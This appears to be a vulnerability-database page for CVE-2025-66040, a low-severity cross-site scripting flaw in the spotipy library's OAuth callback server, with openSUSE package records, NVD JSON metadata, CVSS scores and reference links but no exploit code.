          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "openSUSE Tumbleweed:python311-spotipy-2.25.2-1.1.aarch64",
            "openSUSE Tumbleweed:python311-spotipy-2.25.2-1.1.ppc64le",
            "openSUSE Tumbleweed:python311-spotipy-2.25.2-1.1.s390x",
            "openSUSE Tumbleweed:python311-spotipy-2.25.2-1.1.x86_64",
            "openSUSE Tumbleweed:python312-spotipy-2.25.2-1.1.aarch64",
            "openSUSE Tumbleweed:python312-spotipy-2.25.2-1.1.ppc64le",
            "openSUSE Tumbleweed:python312-spotipy-2.25.2-1.1.s390x",
            "openSUSE Tumbleweed:python312-spotipy-2.25.2-1.1.x86_64",
            "openSUSE Tumbleweed:python313-spotipy-2.25.2-1.1.aarch64",
            "openSUSE Tumbleweed:python313-spotipy-2.25.2-1.1.ppc64le",
            "openSUSE Tumbleweed:python313-spotipy-2.25.2-1.1.s390x",
            "openSUSE Tumbleweed:python313-spotipy-2.25.2-1.1.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "date": "2025-11-27T00:00:00Z",
          "details": "low"
        }
      ],
      "title": "CVE-2025-66040"
    }
  ]
}

FKIE_CVE-2025-66040

Vulnerability from fkie_nvd - Published: 2025-11-27 00:15 - Updated: 2025-12-01 15:39

Severity ?

3.6 (Low) - CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/spotipy-dev/spotipy/commit/880b92d7243dcf2b83bf31dc365a858d8b5e6767
	security-advisories@github.com	https://github.com/spotipy-dev/spotipy/security/advisories/GHSA-r77h-rpp9-w2xm

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Spotipy is a Python library for the Spotify Web API. Prior to version 2.25.2, there is a cross-site scripting (XSS) vulnerability in the OAuth callback server that allows for JavaScript injection through the unsanitized error parameter. Attackers can execute arbitrary JavaScript in the user\u0027s browser during OAuth authentication. This issue has been patched in version 2.25.2."
    }
  ],
  "id": "CVE-2025-66040",
  "lastModified": "2025-12-01T15:39:33.110",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "HIGH",
          "attackVector": "LOCAL",
          "availabilityImpact": "NONE",
          "baseScore": 3.6,
          "baseSeverity": "LOW",
          "confidentialityImpact": "LOW",
          "integrityImpact": "LOW",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 1.0,
        "impactScore": 2.5,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2025-11-27T00:15:55.343",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/spotipy-dev/spotipy/commit/880b92d7243dcf2b83bf31dc365a858d8b5e6767"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/spotipy-dev/spotipy/security/advisories/GHSA-r77h-rpp9-w2xm"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Awaiting Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-79"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2025-66040 (GCVE-0-2025-66040)

GHSA-R77H-RPP9-W2XM

Summary

Details

PoC

Impact

OPENSUSE-SU-2025:15777-1

FKIE_CVE-2025-66040

Tags

Sightings

Nomenclature